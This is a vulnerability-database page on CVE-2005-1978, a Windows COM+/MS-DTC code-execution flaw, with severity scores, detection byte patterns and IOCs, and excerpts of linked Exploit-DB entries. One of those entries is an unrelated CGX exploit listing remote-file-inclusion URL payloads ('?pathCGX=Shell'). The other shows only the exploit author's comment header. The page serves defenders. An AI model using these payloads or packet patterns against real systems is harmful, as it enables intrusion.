CVE-2005-1978
published 2005-10-12CVE-2005-1978: COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code.
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
56.86%
98.9th percentile
COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 d0 16 d0 16 00 00 00 00 01 00 00 00 00 00 01 00 e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
bytes↗
05 00 00 83 10 00 00 00 2c 05 00 00 01 00 00 00 04 05 00 00 00 00 07 00 e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da
- →The exploit targets the MS-DTC (Distributed Transaction Coordinator) RPC interface. The DCERPC bind packet in peer0_0 contains the interface UUID e0 0c 6b 90 0b c7 67 10 b3 17 00 dd 01 06 62 da — monitor for DCERPC BIND requests to this UUID over TCP. ↗
- →The exploit payload (peer0_1) uses a large NOP-sled equivalent of 0xCC bytes (INT3 breakpoint opcodes) interleaved with 0x00 bytes as a heap spray / sled. Detect large blocks of alternating CC 00 patterns in DCERPC request payloads as a strong indicator of this exploit. ↗
- →The exploit author notes the target return/jump address used is 0x684191c4 when the preferred pointer write to 0x7ffdf020 is not feasible. Detect memory access or EIP/RIP values near 0x684191c4 in crash dumps or debugger output on MSDTC/COM+ processes. ↗
- →The DCERPC request packet (peer0_1) has a PDU type byte of 0x83 at offset 3 (opnum field area) and a total fragment length of 0x052c (1324 bytes). Monitor for oversized DCERPC request PDUs to the MS-DTC interface with these characteristics. ↗
- ·The exploit is described as unreliable — only 5 of 10+ tested boxes were successfully exploited ('owned'), and the author expects the real-world success rate to be even lower. Detection based on the payload pattern is more reliable than expecting consistent exploitation outcomes. ↗
- ·The exploit is marked as a POC by its author and may not represent the most effective exploitation technique for CVE-2005-1978/MS05-051. More reliable variants may exist with different payload structures. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CGX 20050314 - 'pathCGX' Remote File Inclusion
exploitdb·2007-05-08
CVE-2007-2611 CGX 20050314 - 'pathCGX' Remote File Inclusion
CGX 20050314 - 'pathCGX' Remote File Inclusion
---
# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerablites
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$
# milw0rm.com [2007-05-08]
Exploit-DB
Microsoft Windows - DTC Remote (MS05-051) (2)
exploitdb·2005-12-01
CVE-2005-2119 Microsoft Windows - DTC Remote (MS05-051) (2)
Microsoft Windows - DTC Remote (MS05-051) (2)
---
/*
Hard to exploit, isn't it? I have tested it on 10+ box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (merde), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10+ blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang
No writeups or analysis indexed.
http://secunia.com/advisories/17161http://secunia.com/advisories/17172http://secunia.com/advisories/17223http://secunia.com/advisories/17509http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdfhttp://www.kb.cert.org/vuls/id/950516http://www.securityfocus.com/bid/15057http://www.us-cert.gov/cas/techalerts/TA05-284A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-051https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1261https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1269https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1466https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1499https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A576https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A816http://secunia.com/advisories/17161http://secunia.com/advisories/17172http://secunia.com/advisories/17223http://secunia.com/advisories/17509http://support.avaya.com/elmodocs2/security/ASA-2005-214.pdfhttp://www.kb.cert.org/vuls/id/950516http://www.securityfocus.com/bid/15057http://www.us-cert.gov/cas/techalerts/TA05-284A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-051https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1261https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1269https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1466https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1499https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A576https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A816
2005-10-12
Published